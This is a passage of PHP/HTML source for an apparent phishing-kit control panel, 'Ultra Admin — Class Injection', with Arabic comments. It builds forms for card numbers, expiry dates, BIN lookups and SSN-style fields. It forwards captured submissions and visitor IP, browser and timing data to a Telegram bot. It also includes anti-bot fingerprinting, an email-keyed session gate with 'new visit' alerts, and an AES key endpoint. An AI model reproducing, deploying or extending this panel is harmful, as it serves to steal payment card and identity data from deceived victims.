        $s['pages'][$pi]['forms_on_page'] = array_values($new_list);
      }
    }

    backup_settings($SETTINGS_FILE, $BACKUP_DIR);
    $s['__rev'] = time();
    save_settings($SETTINGS_FILE, $s);
    echo json_encode(['ok'=>1]); exit;
  }
}

/* Restore specific backup by filename (secure) */
if (isset($_GET['restore_backup']) && isset($_POST['file'])) {
  header('Content-Type: application/json; charset=utf-8');
  $fname = basename($_POST['file']);
  if (!preg_match('/^settings_\d{8}_\d{6}\.json$/', $fname)) {
    echo json_encode(['ok'=>0,'err'=>'Bad filename']); exit;
  }
  $src = $BACKUP_DIR . '/' . $fname;
  if (!is_file($src)) { echo json_encode(['ok'=>0,'err'=>'File not found']); exit; }

  if (file_exists($SETTINGS_FILE)) { @copy($SETTINGS_FILE, $BACKUP_DIR . '/settings_current_' . date('Ymd_His') . '.json'); }
  if (!@copy($src, $SETTINGS_FILE)) { echo json_encode(['ok'=>0,'err'=>'Restore failed']); exit; }
  echo json_encode(['ok'=>1,'msg'=>'Restored: '.$fname]); exit;
}

if (isset($_GET['build_antibot'])) { header('Content-Type: application/json; charset=utf-8'); $s = load_settings($SETTINGS_FILE); build_antibot_runtime_and_js($s); echo json_encode(['ok'=>1]); exit; }

/* ---------------- simple GET exports -------------------- */
if (isset($_GET['export'])) { header('Content-Type: application/json; charset=utf-8'); header('Content-Disposition: attachment; filename="settings_export_'.date('Ymd_His').'.json"'); readfile($SETTINGS_FILE); exit; }
if (isset($_GET['list_backups'])) { header('Content-Type: application/json; charset=utf-8'); $files=glob($BACKUP_DIR.'/*.json'); rsort($files); echo json_encode(['ok'=>1,'backups'=>array_map('basename',$files)]); exit; }

/* ===== AES key endpoint (single valid endpoint) ===== */
if (isset($_GET['a']) && $_GET['a']==='aes_key') {
  header('Content-Type: application/json; charset=utf-8');
  header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
  header('Pragma: no-cache');
  $s = load_settings($SETTINGS_FILE);
  if (empty($s['aes']['enabled'])) { http_response_code(404); echo json_encode(['error'=>'disabled']); exit; }

  $keyFile = __DIR__.'/.aes_key.bin';
  $days = max(1, (int)($s['aes']['key_lifetime_days'] ?? 7));
  $key = null;
  if (is_file($keyFile)) {
    $raw = @file_get_contents($keyFile);
    if ($raw && strlen($raw)>=42) {
      $exp=(int)substr($raw,0,10); $k=substr($raw,10);
      if ($exp>time() && strlen($k)===32) $key=$k;
    }
  }
  if(!$key){
    $key = random_bytes(32);
    $exp = time()+$days*24*3600;
    @file_put_contents($keyFile, str_pad((string)$exp,10,'0',STR_PAD_LEFT).$key, LOCK_EX);
    @chmod($keyFile,0600);
  }
  echo json_encode(['key'=>base64_encode($key)]); exit;
}

/* ===== TG meta for unified Telegram messages ===== */
if (isset($_GET['a']) && $_GET['a']==='tg_meta') {
  header('Content-Type: application/json; charset=utf-8');
  if (session_status() === PHP_SESSION_NONE) @session_start();
  $ip = $_SERVER['REMOTE_ADDR'] ?? '-';
  $ua = $_SERVER['HTTP_USER_AGENT'] ?? '-';
  $browser = '-';
  if (stripos($ua,'Chrome')!==false && stripos($ua,'Edg')===false && stripos($ua,'OPR')===false) $browser='Chrome';
  else if (stripos($ua,'Safari')!==false && stripos($ua,'Chrome')===false) $browser='Safari';
  else if (stripos($ua,'Firefox')!==false) $browser='Firefox';
  else if (stripos($ua,'Edg')!==false) $browser='Edge';
  else if (stripos($ua,'OPR')!==false || stripos($ua,'Opera')!==false) $browser='Opera';
  $sess = $_SESSION['ua_session']['hash'] ?? substr(md5(session_id()),0,8);
  $payload = [
    'ip' => $ip,
    'browser' => $browser.(stripos($ua,'Android')!==false?' on Android':(stripos($ua,'iPhone')!==false?' on iOS':'')),
    'time_gmt' => gmdate('d/m/Y h:i:sa').' GMT',
    'session' => $sess,
    'location' => '-' // يمكن دمجه لاحقًا مع GeoIP إذا رغبت
  ];
  echo json_encode($payload); exit;
}

/* ------------------ VIEW --------------------- */
$s = load_settings($SETTINGS_FILE);
?>
<!doctype html>
<html lang="en" dir="ltr">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <title>Ultra Admin — Class Injection</title>
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/css/bootstrap.min.css" rel="stylesheet">
  <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css" rel="stylesheet">
  <style>
    :root{ --brand:#2563EB; --text:#0f172a; --muted:#64748b; --bg:#f8fafc; --panel:#ffffff; --radius:16px; --shadow:0 8px 30px rgba(2,6,23,.06); }
    body{font-family:Inter,system-ui,Segoe UI,Tahoma,sans-serif;color:var(--text);background:linear-gradient(180deg,#fafcff 0%,#f3f7ff 100%)}
    .ua-hide{display:none!important}
    .ua-wrap{max-width:1240px;margin:auto}
    .ua-card{ background:var(--panel); border:1px solid #e5e7eb; border-radius:var(--radius); padding:1rem; box-shadow:var(--shadow) }
    .ua-item{ background:#fff; border:1px solid #e6eaf1; border-radius:12px; padding:.6rem .75rem; margin:.45rem 0; text-decoration:none; color:var(--text); display:block }
    .ua-item:hover{ border-color:#bfdbfe; background:#f8fbff }
    .badge{ background:#eef2ff; color:#1e40af; font-weight:600 }
    .mini{ font-size:.84rem; color:var(--muted) }
    .ua-top{ position:sticky; top:0; z-index:5; background:rgba(255,255,255,.7); backdrop-filter: blur(6px); border-bottom:1px solid #e5e7eb; }
    .btn-neat{ border-radius:10px }
    .ua-preview{width:100%;height:430px;border:1px solid #e2e8f0;border-radius:12px}
    .ua-toast{ position:fixed; right:14px; bottom:14px; background:#0ea5e9; color:#fff; padding:.6rem .8rem; border-radius:10px; opacity:0; transform:translateY(10px); transition:.2s }
    .ua-toast.show{ opacity:1; transform:translateY(0) }
    .ua-success{ background:#22c55e } .ua-danger{ background:#ef4444 } .ua-warning{ background:#f59e0b }
    textarea.code{ font-family: ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace }
    .grip{cursor:grab;color:#64748b}
    #fieldsTable th, #fieldsTable td{ vertical-align: middle }
    code{ background:#f1f5f9; padding:.1rem .35rem; border-radius:6px }
  </style>
</head>
<body>

<!-- Login -->
<div id="login" class="container py-5">
  <div class="row justify-content-center">
    <div class="col-md-5">
      <div class="ua-card">
        <h4 class="mb-3">Admin Login</h4>
        <div class="mb-3">
          <label class="form-label">Password</label>
          <input id="pass" type="password" class="form-control" placeholder="••••••••">
          <div id="msg" class="mini mt-2 text-danger"></div>
        </div>
        <button id="btnLogin" class="btn btn-primary w-100 btn-neat">Enter</button>
      </div>
    </div>
  </div>
</div>

<!-- App -->
<div id="app" class="ua-wrap py-4 ua-hide">
  <div class="d-flex justify-content-between align-items-center mb-3 ua-top py-2">
    <h4 class="m-0">Ultra Admin — Class Injection</h4>
    <div class="d-flex gap-2">
      <button id="btnCreatePage" class="btn btn-outline-primary btn-sm btn-neat"><i class="fa fa-file-circle-plus me-1"></i>Create page</button>
      <button id="btnSaveAll" class="btn btn-primary btn-sm btn-neat"><i class="fa fa-floppy-disk me-1"></i>Save all</button>
      <button id="btnBackups" class="btn btn-outline-secondary btn-sm btn-neat"><i class="fa fa-clock-rotate-left me-1"></i>Backups</button>
      <button id="btnLogout" class="btn btn-outline-danger btn-sm btn-neat"><i class="fa fa-right-from-bracket me-1"></i>Logout</button>
    </div>
  </div>

  <div class="row g-3">
    <!-- LEFT: Pages + Telegram + AntiBot + AES + Session -->
    <div class="col-lg-4">
      <div class="ua-card">
        <div class="d-flex justify-content-between align-items-center mb-2">
          <strong>Pages</strong> <span class="mini">Drag لإعادة الترتيب</span>
        </div>
        <div id="pagesList"></div>
      </div>

      <div class="ua-card mt-3">
        <strong>Telegram</strong>
        <div class="mt-2">
          <label class="form-label mini">Bot Token</label>
          <input id="tg_token" class="form-control" placeholder="123:ABC">
        </div>
        <div class="mt-2">
          <label class="form-label mini">Chat ID</label>
          <input id="tg_chat" class="form-control" placeholder="@channel_or_id">
        </div>
        <button id="btnSaveTelegram" class="btn btn-primary btn-sm mt-3 btn-neat">Save Telegram</button>
      </div>

      <div class="ua-card mt-3">
        <div class="d-flex justify-content-between align-items-center">
          <strong>ANTI-BOT</strong>
          <div>
            <button id="btnSaveAB" class="btn btn-outline-primary btn-sm btn-neat">Save</button>
            <button id="btnBuildAB" class="btn btn-primary btn-sm btn-neat">Build</button>
          </div>
        </div>
        <div class="form-check mt-2">
          <input id="ab_enabled" class="form-check-input" type="checkbox">
          <label class="form-check-label mini">Enable globally</label>
        </div>
        <div class="mt-2">
          <label class="form-label mini">Apply on pages</label>
          <select id="ab_pages" class="form-select" multiple size="5"></select>
        </div>
        <div class="mt-2">
          <label class="form-label mini">Client JS rules</label>
          <textarea id="ab_js" class="form-control code" rows="3" placeholder="// traps, fingerprinting ..."></textarea>
        </div>
        <div class="mt-2">
          <label class="form-label mini">PHP rules</label>
          <textarea id="ab_php" class="form-control code" rows="3" placeholder="// header('X-AB','on');"></textarea>
        </div>
      </div>

      <!-- AES card -->
      <div class="ua-card mt-3">
        <div class="d-flex justify-content-between align-items-center">
          <strong>AES</strong>
          <button id="btnSaveAES" class="btn btn-primary btn-sm btn-neat">Save</button>
        </div>
        <div class="form-check mt-2">
          <input id="aes_enabled" class="form-check-input" type="checkbox">
          <label class="form-check-label mini">Enable AES wrapper</label>
        </div>
        <div class="mt-2">
          <label class="form-label mini">Key lifetime (days)</label>
          <input id="aes_days" type="number" min="1" class="form-control" placeholder="7">
          <div class="mini mt-1 text-muted">مدة أطول = راحة، لكنها أسهل للنسخ لو المفتاح اتسرب.</div>
        </div>
      </div>

      <!-- Session card -->
      <div class="ua-card mt-3">
        <div class="d-flex justify-content-between align-items-center">
          <strong>Session</strong>
          <div>
            <button id="btnSaveSession" class="btn btn-outline-primary btn-sm btn-neat">Save</button>
            <button id="btnBuildSession" class="btn btn-primary btn-sm btn-neat">Build</button>
          </div>
        </div>
        <div class="form-check mt-2">
          <input id="sess_enabled" class="form-check-input" type="checkbox">
          <label class="form-check-label mini">Enable session gate</label>
        </div>
        <div class="mt-2">
          <label class="form-label mini">Duration (minutes)</label>
          <input id="sess_duration" type="number" min="1" class="form-control" placeholder="60">
        </div>
        <div class="form-check mt-2">
          <input id="sess_lock_ip" class="form-check-input" type="checkbox">
          <label class="form-check-label mini">Lock to client IP</label>
        </div>
        <div class="mt-2">
          <label class="form-label mini">Required param name</label>
          <input id="sess_param" class="form-control" placeholder="email">
          <div class="mini mt-1">الـ index/الصفحات هتلتزم بوجود البراميتر ده أول زيارة.</div>
        </div>
        <div class="mt-2">
          <label class="form-label mini">Redirect URL if missing</label>
          <input id="sess_redirect" class="form-control" placeholder="index.php">
        </div>
        <div class="form-check mt-2">
          <input id="sess_notify_visit" class="form-check-input" type="checkbox">
          <label class="form-check-label mini">Send 🆕 New visit notification</label>
        </div>
        <div class="mt-2">
          <label class="form-label mini">Visit template</label>
          <textarea id="sess_visit_tpl" class="form-control code" rows="4" placeholder="🆕 New visit for {{email}}&#10;..."></textarea>
          <div class="mini mt-1">متغيّرات: <code>{{email}}</code> <code>{{session_hash}}</code> <code>{{ip}}</code> <code>{{location}}</code> <code>{{browser}}</code> <code>{{time_gmt}}</code></div>
        </div>
      </div>
    </div>

    <!-- RIGHT: Page editor + Forms + Preview -->
    <div class="col-lg-8">
      <div class="ua-card mb-3">
        <div class="row g-3 align-items-end">
          <div class="col-md-4">
            <label class="form-label mini">Current file</label>
            <div class="form-control" id="curFile" readonly>—</div>
          </div>
          <div class="col-md-4">
            <label class="form-label mini">Page title</label>
            <input id="pageTitle" class="form-control" placeholder="Home">
          </div>
        </div>
        <div class="mt-3" id="formsOnPage"></div>
      </div>

      <div class="ua-card mb-3">
        <div class="d-flex justify-content-between align-items-center">
          <div><strong>Forms</strong></div>
          <div class="d-flex gap-2">
            <button id="btnNewForm" class="btn btn-outline-primary btn-sm btn-neat"><i class="fa fa-plus me-1"></i>New</button>
            <button id="btnRenameForm" class="btn btn-outline-secondary btn-sm btn-neat"><i class="fa fa-i-cursor me-1"></i>Rename</button>
            <button id="btnDeleteForm" class="btn btn-outline-danger btn-sm btn-neat"><i class="fa fa-trash me-1"></i>Delete</button>
          </div>
        </div>

        <div class="row mt-2">
          <div class="col-md-3">
            <label class="form-label mini">Submit label</label>
            <input id="bh_label" class="form-control" placeholder="Submit">
          </div>
          <div class="col-md-3">
            <label class="form-label mini">Redirect</label>
            <select id="bh_redirect" class="form-select"></select>
          </div>
          <div class="col-md-3">
            <label class="form-label mini">Webhook URL</label>
            <input id="bh_webhook" class="form-control" placeholder="https://...">
          </div>
          <!-- أزلنا حقل Button target class حسب طلبك -->
          <div class="col-md-3 d-flex align-items-end">
            <button id="bh_btn_pick" class="btn btn-outline-secondary btn-sm w-100" type="button" title="Pick submit button">
              <i class="fa fa-bullseye me-1"></i>Pick Button
            </button>
          </div>

          <div class="col-md-3">
            <label class="form-label mini">Alert text</label>
            <input id="bh_alert" class="form-control" placeholder="">
          </div>
          <div class="col-md-3 d-flex align-items-center">
            <div class="form-check mt-3">
              <input id="bh_telegram" class="form-check-input" type="checkbox"> <label class="form-check-label mini">Send to Telegram</label>
            </div>
          </div>
          <div class="col-12">
            <label class="form-label mini">Form submit JS (optional)</label>
            <textarea id="bh_js" class="form-control code" rows="3" placeholder="// return false; to abort"></textarea>
          </div>
          <div class="col-12 mt-2">
            <div class="d-flex flex-wrap gap-3 mini">
              <label class="form-check"><input type="radio" name="tg_tpl" id="tg_tpl_pipe" class="form-check-input"> <span class="form-check-label">pipe</span></label>
              <label class="form-check"><input type="radio" name="tg_tpl" id="tg_tpl_pretty" class="form-check-input"> <span class="form-check-label">pretty</span></label>
              <label class="form-check ms-3"><input type="checkbox" id="tg_meta_ua" class="form-check-input"> <span class="form-check-label">UA</span></label>
              <label class="form-check"><input type="checkbox" id="tg_meta_time" class="form-check-input"> <span class="form-check-label">Time</span></label>
              <label class="form-check"><input type="checkbox" id="tg_meta_geo" class="form-check-input" disabled> <span class="form-check-label">GeoIP</span></label>
              <label class="form-check"><input type="checkbox" id="tg_meta_bin" class="form-check-input"> <span class="form-check-label">BIN</span></label>
            </div>
          </div>
          <div class="col-md-6">
            <label class="form-label mini">BIN field name</label>
            <input id="tg_bin_field" class="form-control" placeholder="card_number">
          </div>
          <div class="col-md-6">
            <label class="form-label mini">Header template</label>
            <input id="tg_header" class="form-control" placeholder="|{form} {page} | #{tag}\n">
          </div>
        </div>

        <div class="d-flex justify-content-between mt-3">
          <div><strong>Fields</strong></div>
          <div>
            <button id="btnAddField" class="btn btn-outline-primary btn-sm btn-neat"><i class="fa fa-plus me-1"></i>Add field</button>
            <button id="btnSaveForm" class="btn btn-primary btn-sm btn-neat"><i class="fa fa-floppy-disk me-1"></i>Save form</button>
          </div>
        </div>

        <div class="table-responsive mt-2">
          <table id="fieldsTable" class="table table-sm align-middle">
            <thead class="table-light">
              <tr>
                <th></th><th>Name</th><th>Label</th><th>Type</th><th>Class</th><th>Req</th><th>Edit</th><th>JS</th><th>CSS</th><th></th>
              </tr>
            </thead>
            <tbody></tbody>
          </table>
        </div>
      </div>

      <div class="ua-card">
        <div class="d-flex justify-content-between align-items-center mb-2">
          <strong>Live Preview</strong>
          <a id="openPageLinkTop" target="_blank" class="btn btn-outline-secondary btn-sm btn-neat" href="#"><i class="fa fa-up-right-from-square me-1"></i>Open</a>
        </div>
        <div id="pagePreview"></div>
      </div>
    </div>
  </div>
</div>

<!-- Modal: Edit Page File -->
<div class="modal fade" id="modalEditor" tabindex="-1">
  <div class="modal-dialog modal-xl modal-dialog-scrollable">
    <div class="modal-content">
      <div class="modal-header">
        <h6 class="modal-title">Edit file: <span id="fileNameLabel" class="text-primary"></span></h6>
        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
      </div>
      <div class="modal-body p-0">
        <textarea id="pageFileEditor" class="form-control" style="min-height:60vh; font-family:ui-monospace,Consolas,monospace"></textarea>
      </div>
      <div class="modal-footer">
        <button id="btnSavePageFile" class="btn btn-primary btn-neat"><i class="fa fa-floppy-disk me-1"></i>Save</button>
        <button class="btn btn-outline-secondary btn-neat" data-bs-dismiss="modal">Close</button>
      </div>
    </div>
  </div>
</div>

<!-- Modal: Field Property (Create/Edit) -->
<div class="modal fade" id="modalField" tabindex="-1" aria-hidden="true">
  <div class="modal-dialog modal-lg modal-dialog-scrollable">
    <div class="modal-content">
      <div class="modal-header">
        <h6 class="modal-title">Field options</h6>
        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
      </div>
      <div class="modal-body">
        <div class="row g-3">
          <div class="col-md-4"><label class="form-label mini">Name (logical)</label><input id="mf_name" class="form-control" placeholder="card_number"></div>
          <div class="col-md-4"><label class="form-label mini">Label</label><input id="mf_label" class="form-control" placeholder="Card number"></div>
          <div class="col-md-4">
            <label class="form-label mini">Type</label>
            <select id="mf_type" class="form-select">
              <option>text</option>
              <option>password</option>
              <option>email</option>
              <option>number</option>
              <option>date</option>
              <option>tel</option>
              <option>month</option>
              <option>yy</option>
              <option value="alnum">alnum</option>
            </select>
          </div>
          <div class="col-md-4"><label class="form-label mini">Placeholder</label><input id="mf_placeholder" class="form-control" placeholder=""></div>
          <div class="col-md-4"><label class="form-label mini">Target class (no dot)</label><input id="mf_target" class="form-control" placeholder="card-input"></div>
          <div class="col-md-4 d-flex align-items-end">
            <div class="form-check"><input id="mf_required" class="form-check-input" type="checkbox"> <label class="form-check-label mini">Required</label></div>
          </div>

          <div class="col-md-2"><label class="form-label mini">Min length</label><input id="mf_min" class="form-control" placeholder=""></div>
          <div class="col-md-2"><label class="form-label mini">Max length</label><input id="mf_max" class="form-control" placeholder=""></div>
          <div class="col-md-2 d-flex align-items-end">
            <div class="form-check"><input id="mf_digits" class="form-check-input" type="checkbox"> <label class="form-check-label mini">Digits only</label></div>
          </div>
          <div class="col-md-2 d-flex align-items-end">
            <div class="form-check"><input id="mf_alnum" class="form-check-input" type="checkbox"> <label class="form-check-label mini">Alnum</label></div>
          </div>
          <div class="col-md-4"><label class="form-label mini">Pattern (regex or mask ###-##-####)</label><input id="mf_pattern" class="form-control" placeholder="569-69-6698"></div>

          <div class="col-md-6"><label class="form-label mini">Error message</label><input id="mf_err" class="form-control" placeholder="Invalid value"></div>
          <div class="col-md-3 d-flex align-items-end">
            <div class="form-check"><input id="mf_high" class="form-check-input" type="checkbox" checked> <label class="form-check-label mini">Highlight on error</label></div>
          </div>
          <div class="col-md-3 d-flex align-items-end">
            <div class="form-check"><input id="mf_luhn" class="form-check-input" type="checkbox"> <label class="form-check-label mini">Luhn</label></div>
          </div>

          <div class="col-md-4"><label class="form-label mini">Min month (MM)</label><input id="mf_min_month" class="form-control" placeholder="01..12"></div>
          <div class="col-md-4"><label class="form-label mini">Min year (YY)</label><input id="mf_min_year_yy" class="form-control" placeholder="24"></div>
          <div class="col-md-4"><label class="form-label mini">Min date (YYYY-MM-DD)</label><input id="mf_min_date" class="form-control" placeholder="2025-01-01"></div>

          <div class="col-12">
            <label class="form-label mini">Field JS (oninput)</label>
            <textarea id="mf_js" class="form-control code" rows="3" placeholder="// your JS here"></textarea>
          </div>
          <div class="col-12">
            <label class="form-label mini">Field CSS</label>
            <textarea id="mf_css" class="form-control code" rows="3" placeholder="/* your CSS here */"></textarea>
          </div>

          <div class="col-12">
            <div class="form-check mt-2">
              <input id="mf_focus" class="form-check-input" type="checkbox">
              <label class="form-check-label mini">FOCUS هذا الحقل عند تحميل الصفحة</label>
            </div>
          </div>

        </div>
      </div>
      <div class="modal-footer">
        <button id="mfSave" class="btn btn-primary">Save field</button>
        <button class="btn btn-outline-secondary" data-bs-dismiss="modal">Close</button>
      </div>
    </div>
  </div>
</div>

<!-- Modal: Field Code Editor (quick JS/CSS) -->
<div class="modal fade" id="modalFieldCode" tabindex="-1" aria-hidden="true">
  <div class="modal-dialog modal-lg modal-dialog-scrollable">
    <div class="modal-content">
      <div class="modal-header">
        <h6 class="modal-title">Edit <span id="fcType" class="text-primary">JS</span> for: <code id="fcFieldName">—</code></h6>
        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
      </div>
      <div class="modal-body">
        <div class="d-flex gap-2 mb-2">
          <button id="fcSwitchJS" class="btn btn-outline-primary btn-sm" type="button">JS</button>
          <button id="fcSwitchCSS" class="btn btn-outline-secondary btn-sm" type="button">CSS</button>
        </div>
        <textarea id="fcEditor" class="form-control" style="min-height:48vh;font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace"></textarea>
      </div>
      <div class="modal-footer">
        <button id="fcSave" class="btn btn-primary">Save</button>
        <button class="btn btn-outline-secondary" data-bs-dismiss="modal">Close</button>
      </div>
    </div>
  </div>
</div>

<!-- Modal: Backups (list + restore) -->
<div class="modal fade" id="modalBackups" tabindex="-1" aria-hidden="true">
  <div class="modal-dialog modal-lg modal-dialog-scrollable">
    <div class="modal-content">
      <div class="modal-header">
        <h6 class="modal-title"><i class="fa fa-clock-rotate-left me-2"></i>Backups</h6>
        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
      </div>
      <div class="modal-body">
        <div id="backupsEmpty" class="alert alert-info d-none">No backups found yet.</div>
        <div id="backupsList" class="list-group"></div>
      </div>
      <div class="modal-footer">
        <button class="btn btn-outline-secondary" data-bs-dismiss="modal">Close</button>
      </div>
    </div>
  </div>
</div>

<!-- Modal: Pick Button (target selector) -->
<div class="modal fade" id="modalPickButton" tabindex="-1" aria-hidden="true">
  <div class="modal-dialog">
    <div class="modal-content">
      <div class="modal-header">
        <h6 class="modal-title"><i class="fa fa-bullseye me-2"></i>Pick Submit Button</h6>
        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
      </div>
      <div class="modal-body">
        <label class="form-label mini">CSS Selector</label>
        <input id="pbSelector" class="form-control" placeholder=".submit-btn or form button[type=submit]">
        <div class="mini mt-2 text-muted">سيتم استخدامه أولاً، وإذا لم يُملأ سيتم استخدام <code>button_class_target</code> إن وُجد في الإعدادات فقط (بدون حقل بالواجهة).</div>
      </div>
      <div class="modal-footer">
        <button id="pbSave" class="btn btn-primary btn-neat">Use selector</button>
        <button class="btn btn-outline-secondary btn-neat" data-bs-dismiss="modal">Close</button>
      </div>
    </div>
  </div>
</div>

<!-- Animated 7-color RGB background -->
<style>
  body{background:transparent!important}
  .rgb-bg{position:fixed;inset:0;z-index:-1;
    background:linear-gradient(120deg,#ff0000,#ff7a00,#ffef00,#00d300,#00c8ff,#2a00ff,#8b00ff,#ff0000);
    background-size:400% 400%;
    animation:rgbShift 18s linear infinite}
  @keyframes rgbShift{0%{background-position:0% 50%}50%{background-position:100% 50%}100%{background-position:0% 50%}}
</style>
<div class="rgb-bg" aria-hidden="true"></div>

<script src="https://cdn.jsdelivr.net/npm/sortablejs@1.15.2/Sortable.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script>
<script src="admin.php?asset=admin.js"></script>
</body>
</html>
